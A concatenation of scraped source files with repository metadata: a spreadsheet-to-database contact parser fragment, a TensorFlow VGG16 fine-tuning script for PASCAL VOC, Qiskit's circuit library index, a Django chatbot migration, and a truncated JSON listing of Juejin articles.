item["联络员姓名"] = sheet.row_values(i)[3]
phone= str(sheet.row_values(i)[4])
item["经营范围"] = sheet.row_values(i)[5]
item["地址"] = sheet.row_values(i)[6]
if ";" in phone:
phone_lt = phone.split(";")
for _ in phone_lt:
if _ and _ != '':
if "." in _:
item["电话"] = _.split(".")[0]
save(item)
else:
item["电话"] = _
save(item)
else:
if phone:
if "." in phone:
item["电话"] = phone.split(".")[0]
save(item)
else:
item["电话"] = phone
save(item)
| [
"[email protected]"
] | |
bbbd89f78abbeb8279500ab0d9bc9f97335753ed | 056f80bf04090be41300ab7693ae0ca888f43a79 | /hw1/04_pascal_vgg16_finetune.py | 5862c812a8edc46984a0f77fe90854828cfe3dcc | [] | no_license | ouyangjiahong/visual-learning | 6e223dc822e97417d296b19d7362f93cafc210bc | 36b7a68f6ea29ad459f8c33fd88e739e4c6f7cac | refs/heads/master | 2021-09-12T14:43:15.310856 | 2018-04-17T19:06:54 | 2018-04-17T19:06:54 | 121,583,147 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 17,683 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import sys
import numpy as np
import tensorflow as tf
import argparse
import os.path as osp
import scipy.misc as sci
from PIL import Image
from functools import partial
import matplotlib.pyplot as plt
from tensorflow.python.tools import inspect_checkpoint as chkp
from tensorflow.python import pywrap_tensorflow
import os
from eval import compute_map
# import model
tf.logging.set_verbosity(tf.logging.INFO)
CLASS_NAMES = [
'aeroplane',
'bicycle',
'bird',
'boat',
'bottle',
'bus',
'car',
'cat',
'chair',
'cow',
'diningtable',
'dog',
'horse',
'motorbike',
'person',
'pottedplant',
'sheep',
'sofa',
'train',
'tvmonitor',
]
BATCH_SIZE = 10
IMAGE_SIZE = 256
IMAGE_CROP_SIZE = 224
MODEL_PATH = "pascal_model_vgg16_finetune"
PRETRAIN_MODEL_PATH = "vgg_16.ckpt"
max_step = 4000
stride = 20
display = 10
# test_num = 10
def cnn_model_fn(features, labels, mode, num_classes=20):
# Build model
if mode == tf.estimator.ModeKeys.TRAIN:
input_layer = tf.reshape(features["x"], [-1, IMAGE_SIZE, IMAGE_SIZE, 3])
else:
input_layer = tf.reshape(features["x"], [-1, IMAGE_CROP_SIZE, IMAGE_CROP_SIZE, 3])
def data_augmentation(inputs):
for i in xrange(BATCH_SIZE):
output = tf.image.random_flip_left_right(inputs[i])
# output = tf.image.random_contrast(output, 0.95, 1.05)
# output += tf.random_normal([IMAGE_SIZE, IMAGE_SIZE, 3], 0, 0.1)
output = tf.random_crop(output, [IMAGE_CROP_SIZE, IMAGE_CROP_SIZE, 3])
output = tf.expand_dims(output, 0)
if i == 0:
outputs = output
else:
outputs = tf.concat([outputs, output], 0)
return outputs
# def center_crop(inputs, size):
# print(size)
# ratio = IMAGE_CROP_SIZE / float(IMAGE_SIZE)
# for i in xrange(size):
# output = tf.image.central_crop(inputs[i], ratio)
# output = tf.expand_dims(output, 0)
# if i == 0:
# outputs = output
# else:
# outputs = tf.concat([outputs, output], 0)
# return outputs
#data augmentation
if mode == tf.estimator.ModeKeys.TRAIN:
input_layer = data_augmentation(input_layer)
# load pretrained model
reader = pywrap_tensorflow.NewCheckpointReader(PRETRAIN_MODEL_PATH)
def vgg_conv(input, num_filters, k_init, b_init):
output = tf.layers.conv2d(
inputs=input,
filters=num_filters,
kernel_size=[3, 3],
strides=[1, 1],
padding="same",
activation=tf.nn.relu,
kernel_initializer=k_init,
bias_initializer=b_init)
return output
def vgg_maxpool(input):
output = tf.layers.max_pooling2d(inputs=input, pool_size=[2, 2], strides=2)
return output
def vgg_dense(input, num_out, k_init, b_init):
output = tf.layers.dense(
inputs=input, units=num_out,
activation=tf.nn.relu,
kernel_initializer=k_init,
bias_initializer=b_init)
return output
def vgg_dropout(input):
output = tf.layers.dropout(
inputs=input, rate=0.5, training=mode == tf.estimator.ModeKeys.TRAIN)
return output
# define the network
# conv block 1
conv1_1 = vgg_conv(input_layer, 64,
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_1/biases')))
conv1_2 = vgg_conv(conv1_1, 64,
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv1/conv1_2/biases')))
pool1 = vgg_maxpool(conv1_2)
# conv block 2
conv2_1 = vgg_conv(pool1, 128,
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_1/biases')))
conv2_2 = vgg_conv(conv2_1, 128,
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv2/conv2_2/biases')))
pool2 = vgg_maxpool(conv2_2)
# conv block 3
conv3_1 = vgg_conv(pool2, 256,
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_1/biases')))
conv3_2 = vgg_conv(conv3_1, 256,
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_2/biases')))
conv3_3 = vgg_conv(conv3_2, 256,
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_3/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv3/conv3_3/biases')))
pool3 = vgg_maxpool(conv3_3)
# conv block 4
conv4_1 = vgg_conv(pool3, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_1/biases')))
conv4_2 = vgg_conv(conv4_1, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_2/biases')))
conv4_3 = vgg_conv(conv4_2, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_3/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv4/conv4_3/biases')))
pool4 = vgg_maxpool(conv4_3)
# conv block 5
conv5_1 = vgg_conv(pool4, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_1/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_1/biases')))
conv5_2 = vgg_conv(conv5_1, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_2/biases')))
conv5_3 = vgg_conv(conv5_2, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_3/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_3/biases')))
pool5 = vgg_maxpool(conv5_3)
# dense
pool5_flat = tf.reshape(pool5, [-1, 512 * 7 * 7])
fc6 = vgg_dense(pool5_flat, 4096,
tf.constant_initializer(reader.get_tensor('vgg_16/fc6/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/fc6/biases')))
dropout1 = vgg_dropout(fc6)
fc7 = vgg_dense(dropout1, 4096,
tf.constant_initializer(reader.get_tensor('vgg_16/fc7/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/fc7/biases')))
dropout2 = vgg_dropout(fc7)
# Logits Layer
logits = vgg_dense(dropout2, 20, None, None)
predictions = {
# Generate predictions (for PREDICT and EVAL mode)
"classes": tf.argmax(input=logits, axis=1),
# Add `softmax_tensor` to the graph. It is used for PREDICT and by the
# `logging_hook`.
"probabilities": tf.nn.sigmoid(logits, name="sigmoid_tensor")
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
# Calculate Loss (for both TRAIN and EVAL modes)
loss = tf.identity(tf.losses.sigmoid_cross_entropy(
multi_class_labels=labels, logits=logits), name='loss')
# Configure the Training Op (for TRAIN mode)
if mode == tf.estimator.ModeKeys.TRAIN:
lr = tf.train.exponential_decay(0.0001, tf.train.get_global_step(), 1000, 0.5)
optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9)
train_op = optimizer.minimize(
loss=loss,
global_step=tf.train.get_global_step())
tf.summary.scalar("learning rate", lr)
tf.summary.image("input image", input_layer[:3,:,:,:])
# for g, v in grads_and_vars:
# if g is not None:
# tf.summary.histogram("{}/grad_histogram".format(v.name), g)
# summary_hook = tf.train.SummarySaverHook(display, summary_op=tf.summary.merge_all())
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, train_op=train_op)
# Add evaluation metrics (for EVAL mode)
eval_metric_ops = {
"accuracy": tf.metrics.accuracy(
labels=labels, predictions=predictions["classes"])}
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)
def load_pascal(data_dir, split='train'):
"""
Function to read images from PASCAL data folder.
Args:
data_dir (str): Path to the VOC2007 directory.
split (str): train/val/trainval split to use.
Returns:
images (np.ndarray): Return a np.float32 array of
shape (N, H, W, 3), where H, W are 224px each,
and each image is in RGB format.
labels (np.ndarray): An array of shape (N, 20) of
type np.int32, with 0s and 1s; 1s for classes that
are active in that image.
"""
# Wrote this function
img_dir = data_dir + 'JPEGImages/'
label_dir = data_dir + 'ImageSets/Main/'
# read images
label_path = label_dir + split + '.txt'
file = open(label_path, 'r')
lines = file.readlines()
file.close()
img_num = len(lines)
first_flag = True
margin = (IMAGE_SIZE - IMAGE_CROP_SIZE) // 2
mean_value = [123, 116, 103]
mean_r = np.tile(np.array(mean_value[0]), (IMAGE_SIZE, IMAGE_SIZE))
mean_g = np.tile(np.array(mean_value[1]), (IMAGE_SIZE, IMAGE_SIZE))
mean_b = np.tile(np.array(mean_value[2]), (IMAGE_SIZE, IMAGE_SIZE))
mean = np.stack((mean_r, mean_g, mean_b), axis=2)
print(mean.shape)
if split != 'test':
img_list = np.zeros((len(lines), IMAGE_SIZE, IMAGE_SIZE, 3))
else:
img_list = np.zeros((len(lines), IMAGE_CROP_SIZE, IMAGE_CROP_SIZE, 3))
count = 0
for line in lines:
line = line[:6]
img_name = img_dir + line + '.jpg'
img = sci.imread(img_name)
img = sci.imresize(img, (IMAGE_SIZE, IMAGE_SIZE, 3))
img = np.subtract(img, mean)
if split == 'test':
img = img[margin:IMAGE_CROP_SIZE+margin, margin:IMAGE_CROP_SIZE+margin, :]
img_list[count, :, :, :] = img
count += 1
if count % 1000 == 1:
print(count)
print("finish loading images")
img_list = img_list.astype(np.float32)
img_list /= 255.0
img_list -= 0.5
img_list *= 2
# read labels
label_list = np.zeros((img_num, 20))
weight_list = np.zeros((img_num, 20))
cls_pos = 0
for class_name in CLASS_NAMES:
img_pos = 0
label_path = label_dir + class_name + '_' + split + '.txt'
# load images
file = open(label_path, 'r')
lines = file.readlines()
file.close()
for line in lines:
label = line.split()[1]
label = int(label)
if label == 1:
label_list[img_pos, cls_pos] = 1
weight_list[img_pos, cls_pos] = 1
# elif label == 0:
# label_list[img_pos, cls_pos] = 1
else:
weight_list[img_pos, cls_pos] = 1
img_pos += 1
cls_pos += 1
print("finish loading label")
img_list = img_list.astype(np.float32)
label_list = label_list.astype(np.int32)
weight_list = weight_list.astype(np.int32)
return img_list, label_list, weight_list
def parse_args():
parser = argparse.ArgumentParser(
description='Train a classifier in tensorflow!')
parser.add_argument(
'data_dir', type=str, default='data/VOC2007',
help='Path to PASCAL data storage')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def _get_el(arr, i):
try:
return arr[i]
except IndexError:
return arr
# class _LoadHook(tf.train.SessionRunHook):
# '''define load pretrain model hook'''
# def begin(self):
# var_map = { 'vgg_16/conv1/conv1_1/weights' : 'conv2d_1/kernel',
# 'vgg_16/conv1/conv1_1/biases' : 'conv2d_1/bias',
# 'vgg_16/conv1/conv1_2/weights' : 'conv2d_2/kernel',
# 'vgg_16/conv1/conv1_2/biases' : 'conv2d_2/bias',
# 'vgg_16/conv2/conv2_1/weights' : 'conv2d_3/kernel',
# 'vgg_16/conv2/conv2_1/biases' : 'conv2d_3/bias',
# 'vgg_16/conv2/conv2_2/weights' : 'conv2d_4/kernel',
# 'vgg_16/conv2/conv2_2/biases' : 'conv2d_4/bias',
# 'vgg_16/conv3/conv3_1/weights' : 'conv2d_5/kernel',
# 'vgg_16/conv3/conv3_1/biases' : 'conv2d_5/bias',
# 'vgg_16/conv3/conv3_2/weights' : 'conv2d_6/kernel',
# 'vgg_16/conv3/conv3_2/biases' : 'conv2d_6/bias',
# 'vgg_16/conv3/conv3_3/weights' : 'conv2d_7/kernel',
# 'vgg_16/conv3/conv3_3/biases' : 'conv2d_7/bias',
# 'vgg_16/conv4/conv4_1/weights' : 'conv2d_8/kernel',
# 'vgg_16/conv4/conv4_1/biases' : 'conv2d_8/bias',
# 'vgg_16/conv4/conv4_2/weights' : 'conv2d_9/kernel',
# 'vgg_16/conv4/conv4_2/biases' : 'conv2d_9/bias',
# 'vgg_16/conv4/conv4_3/weights' : 'conv2d_10/kernel',
# 'vgg_16/conv4/conv4_3/biases' : 'conv2d_10/bias',
# 'vgg_16/conv5/conv5_1/weights' : 'conv2d_11/kernel',
# 'vgg_16/conv5/conv5_1/biases' : 'conv2d_11/bias',
# 'vgg_16/conv5/conv5_2/weights' : 'conv2d_12/kernel',
# 'vgg_16/conv5/conv5_2/biases' : 'conv2d_12/bias',
# 'vgg_16/conv5/conv5_3/weights' : 'conv2d_13/kernel',
# 'vgg_16/conv5/conv5_3/biases' : 'conv2d_13/bias',
# 'vgg_16/fc6/weights' : 'dense/kernel',
# 'vgg_16/fc6/biases' : 'dense/bias',
# 'vgg_16/fc7/weights' : 'dense_2/kernel',
# 'vgg_16/fc7/biases' : 'dense_2/bias'}
# tf.contrib.framework.init_from_checkpoint(PRETRAIN_MODEL_PATH, var_map)
def main():
args = parse_args()
# Load training and eval data
train_data, train_labels, train_weights = load_pascal(
args.data_dir, split='trainval')
eval_data, eval_labels, eval_weights = load_pascal(
args.data_dir, split='test')
# print pre-trained model structure
# checkpoint_path = os.path.join("vgg_16.ckpt")
# reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)
# var_to_shape_map = reader.get_variable_to_shape_map()
# for key in sorted(var_to_shape_map):
# print("tensor_name: ", key)
# print(reader.get_tensor(key).shape)
pascal_classifier = tf.estimator.Estimator(
model_fn=partial(cnn_model_fn, num_classes=train_labels.shape[1]),
model_dir=MODEL_PATH)
tensors_to_log = {"loss": "loss"}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=100)
# loading_hook = _LoadHook()
# Train the model
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data, "w": train_weights},
y=train_labels,
batch_size=BATCH_SIZE,
num_epochs=None,
shuffle=True)
# Evaluate the model and print results
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data, "w": eval_weights},
y=eval_labels,
num_epochs=1,
shuffle=False)
map_list = []
step_list = []
for step in xrange(0, max_step, stride):
pascal_classifier.train(
input_fn=train_input_fn,
steps=stride,
hooks=[logging_hook])
# hooks=[logging_hook, loading_hook])
print("evaluate")
# eval_results = pascal_classifier.evaluate(input_fn=eval_input_fn)
# compute mAP
pred = list(pascal_classifier.predict(input_fn=eval_input_fn))
pred = np.stack([p['probabilities'] for p in pred])
rand_AP = compute_map(
eval_labels, np.random.random(eval_labels.shape),
eval_weights, average=None)
print('Random AP: {} mAP'.format(np.mean(rand_AP)))
gt_AP = compute_map(
eval_labels, eval_labels, eval_weights, average=None)
print('GT AP: {} mAP'.format(np.mean(gt_AP)))
AP = compute_map(eval_labels, pred, eval_weights, average=None)
print('Obtained {} mAP'.format(np.mean(AP)))
print('per class:')
for cid, cname in enumerate(CLASS_NAMES):
print('{}: {}'.format(cname, _get_el(AP, cid)))
# save mAP
map_list.append(np.mean(AP))
step_list.append(step)
if step % 10000 == 0:
fig = plt.figure()
plt.plot(step_list, map_list)
plt.title("mAP")
fig.savefig("task4_mAP_plot.jpg")
fig = plt.figure()
plt.plot(step_list, map_list)
plt.title("mAP")
fig.savefig("task4_mAP_plot.jpg")
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
e9b1a299486c6a98727862c462c3b949bf92b416 | 94c8dd4126da6e9fe9acb2d1769e1c24abe195d3 | /qiskit/circuit/library/__init__.py | 775bf9fdf67fe41e674f190ff83ba2983724d6da | [
"Apache-2.0"
] | permissive | levbishop/qiskit-terra | a75c2f96586768c12b51a117f9ccb7398b52843d | 98130dd6158d1f1474e44dd5aeacbc619174ad63 | refs/heads/master | 2023-07-19T19:00:53.483204 | 2021-04-20T16:30:16 | 2021-04-20T16:30:16 | 181,052,828 | 1 | 0 | Apache-2.0 | 2019-06-05T15:32:13 | 2019-04-12T17:20:54 | Python | UTF-8 | Python | false | false | 7,078 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
===============================================
Circuit Library (:mod:`qiskit.circuit.library`)
===============================================
.. currentmodule:: qiskit.circuit.library
Standard Gates
==============
.. autosummary::
:toctree: ../stubs/
Barrier
C3XGate
C3SXGate
C4XGate
CCXGate
DCXGate
CHGate
CPhaseGate
CRXGate
CRYGate
CRZGate
CSwapGate
CSXGate
CUGate
CU1Gate
CU3Gate
CXGate
CYGate
CZGate
HGate
IGate
MCPhaseGate
MCXGate
MCXGrayCode
MCXRecursive
MCXVChain
Measure
MSGate
PhaseGate
RCCXGate
RC3XGate
Reset
RGate
RXGate
RXXGate
RYGate
RYYGate
RZGate
RZZGate
RZXGate
ECRGate
SGate
SdgGate
SwapGate
iSwapGate
SXGate
SXdgGate
TGate
TdgGate
UGate
U1Gate
U2Gate
U3Gate
XGate
YGate
ZGate
Generalized Gates
=================
.. autosummary::
:toctree: ../stubs/
Diagonal
MCMT
MCMTVChain
Permutation
GMS
GR
GRX
GRY
GRZ
RVGate
Boolean Logic Circuits
======================
.. autosummary::
:toctree: ../stubs/
AND
OR
XOR
InnerProduct
Basis Change Circuits
=====================
.. autosummary::
:toctree: ../stubs/
QFT
Arithmetic Circuits
===================
Amplitude Functions
+++++++++++++++++++
.. autosummary::
:toctree: ../stubs/
LinearAmplitudeFunction
Functional Pauli Rotations
++++++++++++++++++++++++++
.. autosummary::
:toctree: ../stubs/
FunctionalPauliRotations
LinearPauliRotations
PolynomialPauliRotations
PiecewiseLinearPauliRotations
PiecewisePolynomialPauliRotations
PiecewiseChebyshev
Adders
++++++
.. autosummary::
:toctree: ../stubs/
WeightedAdder
Comparators
+++++++++++
.. autosummary::
:toctree: ../stubs/
IntegerComparator
Functions on binary variables
+++++++++++++++++++++++++++++
.. autosummary::
:toctree: ../stubs/
QuadraticForm
Amplitude Functions
===================
.. autosummary::
:toctree: ../stubs/
LinearAmplitudeFunction
Particular Quantum Circuits
===========================
.. autosummary::
:toctree: ../stubs/
FourierChecking
GraphState
HiddenLinearFunction
IQP
QuantumVolume
PhaseEstimation
GroverOperator
PhaseOracle
Probability distributions
=========================
.. autosummary::
:toctree: ../stubs/
UniformDistribution
NormalDistribution
LogNormalDistribution
N-local circuits
================
.. autosummary::
:toctree: ../stubs/
NLocal
TwoLocal
PauliTwoDesign
RealAmplitudes
EfficientSU2
ExcitationPreserving
QAOAAnsatz
Data encoding circuits
======================
.. autosummary::
:toctree: ../stubs/
PauliFeatureMap
ZFeatureMap
ZZFeatureMap
NCT (Not-CNOT-Toffoli) template circuits
========================================
.. autosummary::
:toctree: ../stubs/
templates.nct.template_nct_2a_1
templates.nct.template_nct_2a_2
templates.nct.template_nct_2a_3
templates.nct.template_nct_4a_1
templates.nct.template_nct_4a_2
templates.nct.template_nct_4a_3
templates.nct.template_nct_4b_1
templates.nct.template_nct_4b_2
templates.nct.template_nct_5a_1
templates.nct.template_nct_5a_2
templates.nct.template_nct_5a_3
templates.nct.template_nct_5a_4
templates.nct.template_nct_6a_1
templates.nct.template_nct_6a_2
templates.nct.template_nct_6a_3
templates.nct.template_nct_6a_4
templates.nct.template_nct_6b_1
templates.nct.template_nct_6b_2
templates.nct.template_nct_6c_1
templates.nct.template_nct_7a_1
templates.nct.template_nct_7b_1
templates.nct.template_nct_7c_1
templates.nct.template_nct_7d_1
templates.nct.template_nct_7e_1
templates.nct.template_nct_2a_1
templates.nct.template_nct_9a_1
templates.nct.template_nct_9c_1
templates.nct.template_nct_9c_2
templates.nct.template_nct_9c_3
templates.nct.template_nct_9c_4
templates.nct.template_nct_9c_5
templates.nct.template_nct_9c_6
templates.nct.template_nct_9c_7
templates.nct.template_nct_9c_8
templates.nct.template_nct_9c_9
templates.nct.template_nct_9c_10
templates.nct.template_nct_9c_11
templates.nct.template_nct_9c_12
templates.nct.template_nct_9d_1
templates.nct.template_nct_9d_2
templates.nct.template_nct_9d_3
templates.nct.template_nct_9d_4
templates.nct.template_nct_9d_5
templates.nct.template_nct_9d_6
templates.nct.template_nct_9d_7
templates.nct.template_nct_9d_8
templates.nct.template_nct_9d_9
templates.nct.template_nct_9d_10
Clifford template circuits
==========================
.. autosummary::
:toctree: ../stubs/
clifford_2_1
clifford_2_2
clifford_2_3
clifford_2_4
clifford_3_1
clifford_4_1
clifford_4_2
clifford_4_3
clifford_4_4
clifford_5_1
clifford_6_1
clifford_6_2
clifford_6_3
clifford_6_4
clifford_6_5
clifford_8_1
clifford_8_2
clifford_8_3
RZXGate template circuits
=========================
.. autosummary::
:toctree: ../stubs/
rzx_yz
rzx_xz
rzx_cy
rzx_zz1
rzx_zz2
rzx_zz3
"""
from .standard_gates import *
from .templates import *
from ..barrier import Barrier
from ..measure import Measure
from ..reset import Reset
from .blueprintcircuit import BlueprintCircuit
from .generalized_gates import (
Diagonal,
MCMT,
MCMTVChain,
Permutation,
GMS,
GR,
GRX,
GRY,
GRZ,
RVGate
)
from .boolean_logic import (
AND,
OR,
XOR,
InnerProduct,
)
from .basis_change import QFT
from .arithmetic import (
FunctionalPauliRotations,
LinearPauliRotations,
PiecewiseLinearPauliRotations,
PiecewisePolynomialPauliRotations,
PolynomialPauliRotations,
IntegerComparator,
WeightedAdder,
QuadraticForm,
LinearAmplitudeFunction,
PiecewiseChebyshev,
)
from .n_local import (
NLocal,
TwoLocal,
PauliTwoDesign,
RealAmplitudes,
EfficientSU2,
ExcitationPreserving,
QAOAAnsatz
)
from .data_preparation import (
PauliFeatureMap,
ZFeatureMap,
ZZFeatureMap
)
from .probability_distributions import (
LogNormalDistribution,
NormalDistribution,
UniformDistribution
)
from .quantum_volume import QuantumVolume
from .fourier_checking import FourierChecking
from .graph_state import GraphState
from .hidden_linear_function import HiddenLinearFunction
from .iqp import IQP
from .phase_estimation import PhaseEstimation
from .grover_operator import GroverOperator
from .phase_oracle import PhaseOracle
| [
"[email protected]"
] | |
10f403c415e3258aa195e50df38424e21966e650 | c67831f476cb530fc0c26e0bf4258ce18e986749 | /module_intent/migrations/0001_initial.py | f9fde504260720388d163863648d863149e5b7ff | [
"MIT"
] | permissive | cz-qq/bk-chatbot | a3ce4b86452b3de0ff35430c1c85b91d6b23a3e6 | da37fb2197142eae32158cdb5c2b658100133fff | refs/heads/master | 2023-06-05T05:48:22.083008 | 2021-06-15T10:21:30 | 2021-06-15T10:21:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,294 | py | """
TencentBlueKing is pleased to support the open source community by making
蓝鲸智云PaaS平台社区版 (BlueKing PaaSCommunity Edition) available.
Copyright (C) 2017-2018 THL A29 Limited,
a Tencent company. All rights reserved.
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.db import migrations, models
import module_intent.models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Intent",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"biz_id",
models.PositiveIntegerField(
db_index=True, default=0, verbose_name="业务ID"
),
),
(
"biz_name",
models.CharField(default="", max_length=128, verbose_name="业务名称"),
),
(
"intent_name",
models.CharField(default="", max_length=128, verbose_name="业务名称"),
),
("status", models.BooleanField(default=False, verbose_name="意图状态")),
(
"available_user",
module_intent.models.CompressJSONField(
default=[], verbose_name="可执行用户"
),
),
(
"available_group",
module_intent.models.CompressJSONField(
default=[], verbose_name="可执行群组"
),
),
("is_delete", models.BooleanField(default=False, verbose_name="是否已删除")),
(
"create_by",
models.CharField(default="-", max_length=100, verbose_name="创建人"),
),
(
"create_time",
models.DateTimeField(auto_now=True, verbose_name="创建时间"),
),
(
"update_time",
models.DateTimeField(auto_now=True, verbose_name="更新时间"),
),
],
options={
"verbose_name": "【意图】",
"verbose_name_plural": "【意图】",
},
),
migrations.CreateModel(
name="Task",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"biz_id",
models.PositiveIntegerField(
db_index=True, default=0, verbose_name="业务ID"
),
),
("index_id", models.BigIntegerField(default=-1, verbose_name="索引ID")),
(
"platform",
models.CharField(
choices=[
("JOB", "JOB"),
("SOPS", "标准运维"),
("DEVOPS", "蓝盾"),
("DEFINE", "自定义"),
],
default="JOB",
max_length=128,
verbose_name="平台名称",
),
),
(
"task_id",
models.CharField(
default="JOB", max_length=128, verbose_name="任务ID"
),
),
(
"slots",
module_intent.models.CompressJSONField(
default=[], verbose_name="槽位信息"
),
),
(
"source",
module_intent.models.CompressJSONField(
default={}, verbose_name="任务元数据"
),
),
("script", models.TextField(default="", verbose_name="执行脚本信息")),
],
options={
"verbose_name": "【任务信息】",
"verbose_name_plural": "【任务信息】",
},
),
migrations.CreateModel(
name="Utterances",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"biz_id",
models.PositiveIntegerField(
db_index=True, default=0, verbose_name="业务ID"
),
),
("index_id", models.BigIntegerField(default=-1, verbose_name="索引ID")),
(
"content",
module_intent.models.CompressJSONField(
default=[], verbose_name="语料列表"
),
),
],
options={
"verbose_name": "【语料库】",
"verbose_name_plural": "【语料库】",
},
),
]
| [
"[email protected]"
] | |
611985b190db12a4bf84c0ef33c07bd98b4dab22 | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/前端/juejin_2606.py | c4de48dbcffe8284cf97c951040c5747724d3210 | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69,539 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6995469197673234469", "article_info": {"article_id": "6995469197673234469", "user_id": "1996368848373357", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640528267706382], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "写给走近webpack的自己:webpack notebook", "brief_content": "前言: hello guys!注意标题~ 本文旨在记录学习、自娱自乐。 如果能帮到一些同样对webpack不甚了解的同学我会很开心,但请各路神仙勿喷勿喷哈。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628759709", "mtime": "1628846868", "rtime": "1628759911", "draft_id": "6995067141565186085", "view_count": 219, "collect_count": 4, "digg_count": 7, "comment_count": 1, "hot_index": 18, "is_hot": 0, "rank_index": 0.00299562, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1996368848373357", "user_name": "进击的Oliver", "company": "北京邮电大学", "job_title": "蚂蚁体验技术部-前端实习", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/d89085d9ea0cc4bd53791e9a8521f81d~300x300.image", "level": 2, "description": "前端大四小白!", "followee_count": 16, "follower_count": 37, "post_article_count": 20, "digg_article_count": 30, "got_digg_count": 167, "got_view_count": 8761, "post_shortmsg_count": 2, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 254, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", 